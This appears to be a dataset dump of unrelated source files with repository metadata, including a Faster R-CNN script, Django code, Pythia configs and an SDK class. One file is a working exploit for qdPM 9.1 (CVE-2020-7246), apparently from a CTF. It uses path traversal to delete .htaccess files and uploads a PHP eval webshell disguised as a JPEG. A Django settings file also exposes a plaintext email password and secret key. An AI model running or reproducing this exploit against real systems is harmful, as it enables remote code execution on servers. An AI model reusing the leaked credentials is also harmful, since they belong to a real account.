blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c6ce418a17a5645dd8fd38721fb6b1ab4599495d | e42af159961102976fa48e91a86fda401c5e7fac | /scripts/roiextract.py | f63f4bdfbe8ba18cbd6e276a50412daddf98d545 | [] | no_license | amsword/qdv | 3a0a2b0b265fdce7756d0f0c96282f378f0c046d | 43de38cc05c5d9577a8ab20ef53140ee7eab9d47 | refs/heads/master | 2022-12-21T09:11:40.043697 | 2018-06-01T19:28:52 | 2018-06-01T19:28:52 | 132,514,671 | 0 | 1 | null | 2022-12-13T09:24:16 | 2018-05-07T20:46:20 | Python | UTF-8 | Python | false | false | 8,593 | py | #!python2
import os.path as op
import _init_paths
from fast_rcnn.config import cfg
from fast_rcnn.nms_wrapper import nms
from fast_rcnn.bbox_transform import bbox_transform_inv, clip_boxes
from utils.timer import Timer
import matplotlib.pyplot as plt
import numpy as np
import scipy.io as sio
import caffe, os, sys, cv2
import argparse
import math;
import json;
import base64;
import progressbar;
def encode_array(nparray):
shapestr = ",".join([str(x) for x in nparray.shape])
array_binary = nparray.tobytes();
b64str = base64.b64encode(array_binary).decode()
return ";".join([shapestr,b64str]);
def decode_array(bufferstr) :
(shapestr,b64str) = [x.strip() for x in bufferstr.split(";")];
arrayshape = [int(x) for x in shapestr.split(",")];
array_binary = base64.b64decode(b64str);
nparray = np.fromstring(array_binary, dtype=np.dtype('float32'));
return nparray.reshape(arrayshape);
def img_from_base64(imagestring):
jpgbytestring = base64.b64decode(imagestring)
nparr = np.fromstring(jpgbytestring, np.uint8)
try:
return cv2.imdecode(nparr, cv2.IMREAD_COLOR);
except:
return None;
def postfilter(scores, boxes, class_map, max_per_image=100, thresh=0.05, nms_thresh=0.3):
class_num = scores.shape[1]; #first class is background
# all detections are collected into:
# all_boxes[cls] = N x 5 array of detections in
# (x1, y1, x2, y2, score)
all_boxes = [[] for _ in xrange(class_num)]
# skip j = 0, because it's the background class
for j in range(1,class_num):
inds = np.where(scores[:, j] > thresh)[0]
cls_scores = scores[inds, j]
cls_boxes = boxes[inds, j*4:(j+1)*4]
cls_dets = np.hstack((cls_boxes, cls_scores[:, np.newaxis])).astype(np.float32, copy=False)
keep = nms(cls_dets, nms_thresh)
all_boxes[j] = cls_dets[keep, :]
# Limit to max_per_image detections *over all classes*
if max_per_image > 0:
image_scores = np.hstack([all_boxes[j][:, -1] for j in xrange(1, class_num)])
if len(image_scores) > max_per_image:
image_thresh = np.sort(image_scores)[-max_per_image];
for j in xrange(1, class_num):
keep = np.where(all_boxes[j][:, -1] >= image_thresh)[0]
all_boxes[j] = all_boxes[j][keep, :]
det_results = [];
for j in xrange(1, class_num):
for rect in all_boxes[j]:
crect = dict();
crect['rect'] = [float(x) for x in list(rect[:4])];
crect['class'] = class_map[j];
crect['conf'] = float(rect[4]);
det_results += [crect];
return json.dumps(det_results);
class FileProgressingbar:
fileobj = None;
pbar = None;
def __init__(self,fileobj):
fileobj.seek(0,os.SEEK_END);
flen = fileobj.tell();
fileobj.seek(0,os.SEEK_SET);
self.fileobj = fileobj;
widgets = ['Test: ', progressbar.AnimatedMarker(),' ', progressbar.Percentage(), ' ', progressbar.Bar(), ' ', progressbar.ETA()]
self.pbar = progressbar.ProgressBar(widgets=widgets, maxval=flen).start()
def update(self):
self.pbar.update(self.fileobj.tell());
def parse_args():
"""Parse input arguments."""
parser = argparse.ArgumentParser(description='Faster R-CNN demo')
parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]', default=0, type=int)
parser.add_argument('--net', dest='net', help='Network to use ' )
parser.add_argument('--intsv', required=True, help='input tsv file for images, col_0:key, col_1:imgbase64')
parser.add_argument('--colkey', required=False, type=int, default=0, help='key col index');
parser.add_argument('--colimg', required=False, type=int, default=2, help='imgdata col index');
parser.add_argument('--outtsv', required=False, default="", help='output tsv file with roi info')
parser.add_argument('--count', required=False, default=300, type=int, help='number of rois outputed by RPN')
args = parser.parse_args()
return args
def im_list_to_blob(ims):
"""Convert a list of images into a network input.
Assumes images are already prepared (means subtracted, BGR order, ...).
"""
max_shape = np.array([im.shape for im in ims]).max(axis=0)
num_images = len(ims)
blob = np.zeros((num_images, max_shape[0], max_shape[1], 3),
dtype=np.float32)
for i in xrange(num_images):
im = ims[i]
blob[i, 0:im.shape[0], 0:im.shape[1], :] = im
# Move channels (axis 3) to axis 1
# Axis order will become: (batch elem, channel, height, width)
channel_swap = (0, 3, 1, 2)
blob = blob.transpose(channel_swap)
return blob
def _get_image_blob(im):
#Converts an image into a network input.
im_orig = im.astype(np.float32, copy=True)
im_orig -= cfg.PIXEL_MEANS
im_shape = im_orig.shape
im_size_min = np.min(im_shape[0:2])
im_size_max = np.max(im_shape[0:2])
processed_ims = []
im_scale_factors = []
for target_size in cfg.TEST.SCALES:
im_scale = min (float(target_size) / float(im_size_min), float(cfg.TEST.MAX_SIZE) / float(im_size_max));
im = cv2.resize(im_orig, None, None, fx=im_scale, fy=im_scale, interpolation=cv2.INTER_LINEAR) if im_scale!=1.0 else np.copy(im_orig);
im_scale_factors.append(im_scale)
processed_ims.append(im)
im_scale_factors.append(1.0)
# Create a blob to hold the input images
blob = im_list_to_blob(processed_ims)
return blob, np.array(im_scale_factors)
def tsvdet(caffemodel, intsv_file, key_idx,img_idx,outtsv_file, **kwargs):
prototxt = op.splitext(caffemodel)[0] + '.prototxt' if 'proto' not in kwargs else kwargs['proto'];
cmapfile = op.splitext(caffemodel)[0] + '.labelmap' if 'cmap' not in kwargs else kwargs['cmap'];
if not os.path.isfile(caffemodel) :
raise IOError(('{:s} not found.').format(caffemodel))
if not os.path.isfile(prototxt) :
raise IOError(('{:s} not found.').format(prototxt))
cmap = ['background'];
with open(cmapfile,"r") as tsvIn:
for line in tsvIn:
cmap +=[line.split("\t")[0].strip()];
count = 0;
net = caffe.Net(prototxt, caffemodel, caffe.TEST)
#print ('\n\nLoaded network {:s}'.format(caffemodel));
with open(outtsv_file,"w") as tsv_out:
with open(intsv_file,"r") as tsv_in :
bar = FileProgressingbar(tsv_in);
for line in tsv_in:
cols = [x.strip() for x in line.split("\t")];
if len(cols)> 1:
# Load the image
im = img_from_base64(cols[img_idx]);
"""Convert an image and RoIs within that image into network inputs."""
blobs = {'data' : None, 'rois' : None}
blobs['data'], im_scales = _get_image_blob(im)
im_blob = blobs['data']
blobs['im_info'] = np.array([[im_blob.shape[2], im_blob.shape[3], im_scales[0]]], dtype=np.float32)
# reshape network inputs
net.blobs['data'].reshape(*(blobs['data'].shape))
net.blobs['im_info'].reshape(*(blobs['im_info'].shape))
# do forward
forward_kwargs = {'data': blobs['data'].astype(np.float32, copy=False), 'im_info' : blobs['im_info'].astype(np.float32, copy=False)}
blobs_out = net.forward(**forward_kwargs)
rois = net.blobs['rois'].data.copy()
#rois_score = net.blobs['rois_score'].data.copy()
# unscale back to raw image space
roiboxes = rois[:, 1:5] / im_scales[0]
crects = [];
for i in range(min(roiboxes.shape[0], args.count)):
crects += [{'rect':[float(x) for x in list(roiboxes[i,:])] }];
tsv_out.write(cols[key_idx] + "\t" + json.dumps(crects)+"\n")
count += 1;
bar.update();
caffe.print_perf(count);
if __name__ == '__main__':
args = parse_args()
outtsv_file = args.outtsv if args.outtsv!="" else os.path.splitext(args.intsv)[0]+".rois";
caffemodel = args.net;
cfg['TEST'].RPN_POST_NMS_TOP_N = args.count;
if args.gpu_id<0:
caffe.set_mode_cpu()
else:
caffe.set_mode_gpu()
caffe.set_device(args.gpu_id)
cfg.GPU_ID = args.gpu_id
tsvdet(caffemodel, args.intsv, args.colkey, args.colimg, outtsv_file);
| [
"jianfengwang@outlook.com"
] | jianfengwang@outlook.com |
c231bdae8240c64b396674a0fdb0135b62a4b978 | cd8823a1c99c74c8ad720e93158feb6a29bc04ff | /2020-CSGCTF-Final/web/easy_upload/exploit.py | 8dfc6f4119afe11b0db25a8bb87b8635b5a7d8af | [] | no_license | kerlingcode/Attack-Defense-Challenges | 0ef12a3897f5fa4898fbac9bdee65fd3fdeeec89 | 2f5a62be814afb471be47bf3854a776296d1873f | refs/heads/master | 2023-05-27T09:21:11.962707 | 2020-10-23T12:17:15 | 2020-10-23T12:17:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,644 | py | #encoding:utf-8
# Exploit Title: qdPM 9.1 - Remote Code Execution
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2020-01-22
# Exploit Author: Rishal Dwivedi (Loginsoft)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Windows 10 (Python 2.7)
# CVE : CVE-2020-7246
# Exploit written in Python 2.7
# Tested Environment - Windows 10
# Path Traversal + Remote Code Execution
# Command - qdpm-exploit.py -url http://localhost/ -u user@localhost.com -p password
# -*- coding: utf-8 -*-
#!/usr/bin/python
import requests
from lxml import html
from argparse import ArgumentParser
session_requests = requests.session()
def multifrm(
userid,
username,
csrftoken_,
EMAIL,
HOSTNAME,
uservar,
):
request_1 = {
'sf_method': (None, 'put'),
'users[id]': (None, userid[-1]),
'users[photo_preview]': (None, uservar),
'users[_csrf_token]': (None, csrftoken_[-1]),
'users[name]': (None, username[-1]),
'users[new_password]': (None, ''),
'users[email]': (None, EMAIL),
'extra_fields[9]': (None, ''),
'users[remove_photo]': (None, '1'),
}
return request_1
def req(
userid,
username,
csrftoken_,
EMAIL,
HOSTNAME,
):
request_1 = multifrm(
userid,
username,
csrftoken_,
EMAIL,
HOSTNAME,
'.htaccess',
)
new = session_requests.post(HOSTNAME + '/index.php/myAccount/update', files=request_1)
request_2 = multifrm(
userid,
username,
csrftoken_,
EMAIL,
HOSTNAME,
'../uploads/.htaccess',
)
new1 = session_requests.post(HOSTNAME + '/index.php/myAccount/update', files=request_2)
request_3 = {
'sf_method': (None, 'put'),
'users[id]': (None, userid[-1]),
'users[photo_preview]': (None, ''),
'users[_csrf_token]': (None, csrftoken_[-1]),
'users[name]': (None, username[-1]),
'users[new_password]': (None, ''),
'users[email]': (None, EMAIL),
'extra_fields[9]': (None, ''),
'users[photo]': ('backdoor.jpg','<?php eval($_REQUEST["c"]);?>', 'application/octet-stream'),
}
upload_req = session_requests.post(HOSTNAME
+ '/index.php/myAccount/update', files=request_3)
def main(HOSTNAME, EMAIL, PASSWORD):
result = session_requests.get(HOSTNAME + '/index.php/login')
login_tree = html.fromstring(result.text)
authenticity_token = \
list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value"
)))[0]
payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,
'login[_csrf_token]': authenticity_token}
result = session_requests.post(HOSTNAME + '/index.php/login',
data=payload,
headers=dict(referer=HOSTNAME
+ '/index.php/login'))
account_page = session_requests.get(HOSTNAME + '/index.php/myAccount'
)
account_tree = html.fromstring(account_page.content)
userid = account_tree.xpath("//input[@name='users[id]']/@value")
username = account_tree.xpath("//input[@name='users[name]']/@value")
csrftoken_ = \
account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
print(userid, username, csrftoken_)
req(userid, username, csrftoken_, EMAIL, HOSTNAME)
'''
get_file = session_requests.get(HOSTNAME + '/index.php/myAccount')
print(get_file.content.split('me="users[photo_preview]" value="')[1].split("\"")[0])
final_tree = html.fromstring(get_file.content)
backdoor = \
final_tree.xpath("//input[@name='users[photo_preview]']/@value")
print 'Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' \
+ backdoor[-1] + '?cmd=whoami'
'''
# http://172.16.9.20:9003//uploads/users/861431-backdoor.jpg
if __name__ == '__main__':
parser = \
ArgumentParser(description='qdmp - Path traversal + RCE Exploit'
)
parser.add_argument('-url', '--host', dest='hostname',
help='Project URL')
parser.add_argument('-u', '--email', dest='email',
help='User email (Any privilege account)')
parser.add_argument('-p', '--password', dest='password',
help='User password')
args = parser.parse_args()
main(args.hostname, args.email, args.password)
| [
"wangyihanger@gmail.com"
] | wangyihanger@gmail.com |
6810077126993b6259cdadaf445985aaea672563 | df3831a39f24ddb4762acea38c7a2d2f9a5841af | /backend/menu/migrations/0001_initial.py | 65dd7cd5ede9cf4dde953080191c05bc2ea42ce8 | [] | no_license | crowdbotics-apps/test-28224 | d71d3f3c28ebb68e4c9341f67c61faa59e5419d4 | 2d7d908c24a8e36388701db4478c168380c77b15 | refs/heads/master | 2023-05-31T18:46:23.878057 | 2021-06-25T08:41:27 | 2021-06-25T08:41:27 | 380,176,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,144 | py | # Generated by Django 2.2.20 on 2021-06-25 08:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('delivery_user_profile', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('description', models.TextField()),
('image', models.URLField()),
('icon', models.URLField()),
],
),
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('description', models.TextField()),
('prefix', models.CharField(max_length=8)),
('flag', models.URLField()),
],
),
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('description', models.TextField()),
('image', models.URLField()),
('category', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='item_category', to='menu.Category')),
],
),
migrations.CreateModel(
name='Review',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rating', models.FloatField()),
('review_text', models.TextField()),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='review_item', to='menu.Item')),
('profile', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='review_profile', to='delivery_user_profile.Profile')),
],
),
migrations.CreateModel(
name='ItemVariant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('description', models.TextField()),
('price', models.FloatField()),
('image', models.URLField()),
('country', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='itemvariant_country', to='menu.Country')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='itemvariant_item', to='menu.Item')),
],
),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
2c2399c9bcde7c1c04d42548d79ee43949c265ab | de8e0c5c759347917ca7f06b42ca6c82b8f8c95f | /baekjoon/11_math-2/Factorization.py | 8d80ae4f5f9060fa52fa0def7dd54001a9dfad6a | [] | no_license | Greek-and-Roman-God/Apollo | aaeb315a9e70c719b3e53e3c4b9b5dde7b517ec0 | 2823cbcc9fc10ecd3f1785732403cb9c288f8ef3 | refs/heads/main | 2023-08-23T12:08:05.322733 | 2021-10-02T10:54:13 | 2021-10-02T10:54:13 | 308,242,023 | 1 | 1 | null | 2020-11-26T12:03:44 | 2020-10-29T06:49:26 | Python | UTF-8 | Python | false | false | 336 | py | # 11653 소인수분해
# https://www.acmicpc.net/problem/11653
# 1
n = int(input())
i = 2
while 1:
if n == 1:
break
if n % i:
i += 1
else:
print(i)
n = n // i
# 2
n = int(input())
for i in range(2, n//2+1):
while n % i == 0:
print(i)
n //= i
if n != 1:
print(n)
| [
"doyeon311@gmail.com"
] | doyeon311@gmail.com |
55f8b63206df9c4f94fa808d1378427acc157245 | 61a2e1f3ca7052994d93b3861acb2dd1609ce696 | /node_one.py | 7efd90e4699ebf0fb263fcc217830d2c15586368 | [] | no_license | smartinternz02/SI-GuidedProject-3921-1626161836 | f7faf3cb4aacfa721090a4a60ec94c347f60b981 | 65b78a2a5230c7505c14ae84ca1962388d4b1d2a | refs/heads/main | 2023-07-01T01:52:53.001711 | 2021-08-04T17:12:39 | 2021-08-04T17:12:39 | 385,518,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | #! /usr/bin/env python3
import rospy
rospy.init_node("node_1")
rate=rospy.Rate(3)
while not rospy.is_shutdown():
print ('sensor : sensor : 1')
rate.sleep()
| [
"noreply@github.com"
] | smartinternz02.noreply@github.com |
dd2643198e3628db67cbaaa1352484747eb7661d | d250ff521ed87aca7d53d2c8557f904b32d9ce3b | /sba-4-api(before)/com_sba_api/home/home_api.py | 180c2467b44e0064b0bae221b4d7acf6b86055cd | [] | no_license | taepd/ML-study | 9dc6f341761caf854a8a36a1fe0a903a4d41af9a | 7e987d5eb638fc375105472a35c2d9d5a14c14b9 | refs/heads/master | 2023-01-05T02:14:42.555096 | 2020-10-27T02:43:16 | 2020-10-27T02:43:16 | 303,552,689 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | from com_sba_api.ext.db import config
class HomeApi():
def __init__(self):
...
| [
"taepd1@gmail.com"
] | taepd1@gmail.com |
7c19cd20c5fdbbb7d7b6e85d7c9ca309db7e3e60 | 48cee55c3f85af2a27dca1197ea755b4dc75b1ec | /school_site/school_site/settings.py | 787d2ce640c73cd1571df5ea9affa730df26c5c4 | [] | no_license | alex6446/SchoolWebsite | 07f903aad00df48e097928aef4502946862a8706 | 95a70562e502a2258463291868a6225605b66e7e | refs/heads/master | 2023-05-05T08:26:19.225029 | 2019-08-21T15:43:28 | 2019-08-21T15:43:28 | 182,879,554 | 0 | 0 | null | 2023-04-21T20:32:50 | 2019-04-22T22:49:05 | Python | UTF-8 | Python | false | false | 5,549 | py | """
Django settings for school_site project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')2%l9n1mr$8&=ji^4(--6s7_yvg+221=v(z1r*w-c%+)bvae8m'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [
'e020e431.ngrok.io',
'localhost'
]
SITE_ID = 1
# Application definition
INSTALLED_APPS = [
# 'easy_maps',
'crispy_forms',
'django.contrib.sites',
'fluent_contents.plugins.googledocsviewer',
'fluent_contents',
'django_wysiwyg',
'filebrowser',
'tinymce',
'core.apps.CoreConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'school_site.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'core.context_processors.menu',
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'school_site.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'uk-ua'
TIME_ZONE = 'Etc/GMT-3'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'core/static')
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# TINYMCE_JS_ROOT = os.path.join(MEDIA_ROOT + 'js/tiny_mce')
# TINYMCE_JS_URL = os.path.join(MEDIA_URL + 'js/tiny_mce/tiny_mce.js')
#TINYMCE_COMPRESSOR = True
TINYMCE_DEFAULT_CONFIG = {
'height': 360,
'width': 920,
'language': 'ru',
'cleanup_on_startup': True,
'custom_undo_redo_levels': 20,
'selector': 'textarea',
'theme': 'modern',
'plugins': '''
textcolor colorpicker save link image media preview codesample
table code lists fullscreen insertdatetime nonbreaking
directionality searchreplace wordcount visualblocks
visualchars code fullscreen autolink lists charmap print hr
anchor pagebreak paste
''',
'toolbar1': '''
bold italic underline | fontselect,
fontsizeselect | forecolor backcolor | link image media | charmap hr | code preview fullscreen |
''',
'toolbar2': '''
alignleft alignright |
aligncenter alignjustify | indent outdent | bullist numlist table |
''',
'menubar': True,
'statusbar': True,
'visual': True,
'fontsize_formats': "8pt 10pt 11pt 12pt 14pt 16pt 18pt 20pt 22pt 24pt 28pt 32pt 36pt 42pt 48pt",
'paste_as_text': True,
# 'contextmenu': "paste",
# 'forced_p_newlines': False,
# 'forced_br_newlines': True,
# 'forced_root_block': '',
}
EMAIL_USE_TLS = True
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = 'school2testing321@gmail.com'
EMAIL_HOST_PASSWORD = 'testing321'
EMAIL_PORT = 587
# ACCOUNT_EMAIL_SUBJECT_PREFIX = 'school2'
CRISPY_TEMPLATE_PACK = 'bootstrap4'
# EASY_MAPS_GOOGLE_KEY = 'AIzaSyCwRFDROO70Wg4OJe9XmzSbM6pht-jOzBk'
#EMAIL_HOST = 'localhost'
#EMAIL_PORT = 1025
"""STATICFILES_DIRS= [
os.path.join(BASE_DIR , "static")
]"""
#DEFAULT_PATH_TINYMCE = os.path.join(BASE_DIR, "static/js/tinymce/")
#FILEBROWSER_DIRECTORY = os.path.join(BASE_DIR, 'media')
| [
"alexeymedenitskiy@gmail.com"
] | alexeymedenitskiy@gmail.com |
9b598bc9c4ff34fb5648be5ae59a74d0e35b15a6 | f09dc121f213f2881df3572288b7ee5b39246d73 | /aliyun-python-sdk-facebody/aliyunsdkfacebody/request/v20191230/FaceTidyupRequest.py | bd3dd8d1d01277e27829dad5632f7f2be6488b63 | [
"Apache-2.0"
] | permissive | hetw/aliyun-openapi-python-sdk | 2f31378ad6be0896fb8090423f607e9c7d3ae774 | 7443eacee9fbbaa93c7975c6dbec92d3c364c577 | refs/heads/master | 2023-01-19T22:42:36.214770 | 2020-12-04T10:55:14 | 2020-12-04T10:55:14 | 318,689,093 | 1 | 0 | NOASSERTION | 2020-12-05T03:03:03 | 2020-12-05T03:03:03 | null | UTF-8 | Python | false | false | 1,759 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkfacebody.endpoint import endpoint_data
class FaceTidyupRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'facebody', '2019-12-30', 'FaceTidyup','facebody')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ShapeType(self):
return self.get_body_params().get('ShapeType')
def set_ShapeType(self,ShapeType):
self.add_body_params('ShapeType', ShapeType)
def get_Strength(self):
return self.get_body_params().get('Strength')
def set_Strength(self,Strength):
self.add_body_params('Strength', Strength)
def get_ImageURL(self):
return self.get_body_params().get('ImageURL')
def set_ImageURL(self,ImageURL):
self.add_body_params('ImageURL', ImageURL) | [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
f7d51e3a6b1ac091d8c13e846c331927665c44f8 | 2daa3894e6d6929fd04145100d8a3be5eedbe21c | /tests/artificial/transf_sqr/trend_poly/cycle_30/ar_/test_artificial_32_sqr_poly_30__20.py | c35f1cbece77dfa19a9d05c6952d04f152c8fa7b | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Henri-Lo/pyaf | a1f73a0cc807873bd7b79648fe51de9cfd6c126a | 08c968425d85dcace974d90db7f07c845a0fe914 | refs/heads/master | 2021-07-01T12:27:31.600232 | 2017-09-21T11:19:04 | 2017-09-21T11:19:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
dataset = tsds.generate_random_TS(N = 32 , FREQ = 'D', seed = 0, trendtype = "poly", cycle_length = 30, transform = "sqr", sigma = 0.0, exog_count = 20, ar_order = 0);
art.process_dataset(dataset); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
0fcec58fc11b709d3ffc87d5b56c30844cb06f65 | 3b60e6f4bbc011003ac4929f01eb7409918deb79 | /Analysis_v1/Simulation/Pythia/ADD/ADDCP2/CP2ADDfragments/ADDGravToGG_NegInt-1_LambdaT-13000_M-500To1000_TuneCP2_13TeV-pythia8_cfi.py | 78d803ed1b2732950af25c8bd36f9480d5261f5e | [] | no_license | uzzielperez/Analyses | d1a64a4e8730325c94e2bc8461544837be8a179d | 1d66fa94763d7847011ea551ee872936c4c401be | refs/heads/master | 2023-02-09T04:54:01.854209 | 2020-09-07T14:57:54 | 2020-09-07T14:57:54 | 120,850,137 | 0 | 0 | null | 2020-06-17T16:48:16 | 2018-02-09T03:14:04 | C++ | UTF-8 | Python | false | false | 1,251 | py | import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.MCTunes2017.PythiaCP2Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
maxEventsToPrint = cms.untracked.int32(1),
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1.0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(13000.),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CP2SettingsBlock,
processParameters = cms.vstring(
'ExtraDimensionsLED:LambdaT = 13000.0',
'ExtraDimensionsLED:n = 4',
'ExtraDimensionsLED:ffbar2gammagamma = on',
'ExtraDimensionsLED:gg2gammagamma = on',
'ExtraDimensionsLED:CutOffmode = 2',
'ExtraDimensionsLED:NegInt= 1',
'PhaseSpace:pTHatMin = 70.0',
'PhaseSpace:mHatMin = 500.0',
'PhaseSpace:mHatMax = 1000.0',
),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CP2Settings',
'processParameters',
)
)
)
| [
"uzzie.perez@cern.ch"
] | uzzie.perez@cern.ch |
60a013cf7859de16009c09d82cd971ec5a83cc70 | b144c5142226de4e6254e0044a1ca0fcd4c8bbc6 | /ixnetwork_restpy/testplatform/sessions/ixnetwork/quicktest/rfc3918burdenedjoindelay_778fcaab0dc095f7632f49846264f03c.py | 156bd5c3f19ed297831cd271628219ace0b4800e | [
"MIT"
